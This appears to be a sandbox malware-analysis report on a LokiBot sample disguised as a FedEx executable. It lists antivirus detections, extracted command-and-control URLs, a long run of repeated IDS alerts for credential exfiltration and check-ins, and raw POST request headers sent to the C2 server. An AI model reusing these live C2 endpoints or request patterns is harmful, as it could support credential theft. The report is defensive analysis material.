                Show All Signature Results

                AV Detection

                barindex
                Source: FedEx_776282383902.exeAvira: detected
                Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
                Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
                Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
                Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
                Source: http://45.61.137.215/index.php/feed/Avira URL Cloud: Label: malware
                Source: http://45.61.137.215/index.php/comments/feed/Avira URL Cloud: Label: malware
                Source: http://45.61.137.215/index.php/t?id=090Avira URL Cloud: Label: malware
                Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.61.137.215/index.php/t?id=090"]}
                Source: FedEx_776282383902.exeReversingLabs: Detection: 65%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: FedEx_776282383902.exeJoe Sandbox ML: detected
                Source: FedEx_776282383902.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: FedEx_776282383902.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\FedEx_776282383902.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74

                Networking

                barindex
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49704 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49704 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49704 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49704 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49707 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49707 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49707 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49707 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49708 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49708 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49708 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49708 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49709 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49709 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49709 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49709 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49710 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49710 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49710 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49710 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49716 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49716 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49716 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49716 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49717 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49717 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49717 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49717 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49718 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49718 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49718 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49718 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49719 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49719 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49719 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49719 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49720 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49720 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49720 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49720 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49721 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49721 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49721 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49721 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49722 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49722 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49722 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49722 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49723 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49723 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49723 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49723 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49724 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49724 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49724 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49724 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49725 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49725 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49725 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49725 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49726 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49726 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49726 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49726 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49727 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49727 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49727 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49727 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49729 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49729 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49729 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49729 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49730 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49730 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49730 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49730 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49731 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49731 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49731 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49731 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49732 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49732 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49732 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49732 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49733 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49733 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49733 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49733 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49734 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49734 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49734 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49734 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49735 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49735 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49735 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49735 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49736 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49736 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49736 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49736 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49737 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49737 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49737 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49737 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49738 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49738 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49738 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49738 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49739 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49739 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49739 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49739 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49740 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49740 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49740 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49740 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49741 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49741 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49741 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49741 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49742 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49742 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49742 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49742 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49743 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49743 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49743 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49743 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49744 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49744 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49744 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49744 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49745 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49745 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49745 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49745 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49746 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49746 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49746 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49746 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49747 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49747 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49747 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49747 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49748 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49748 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49748 -> 45.61.137.215:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49748 -> 45.61.137.215:80
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://45.61.137.215/index.php/t?id=090
                Source: Joe Sandbox ViewIP Address: 45.61.137.215 45.61.137.215
                Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
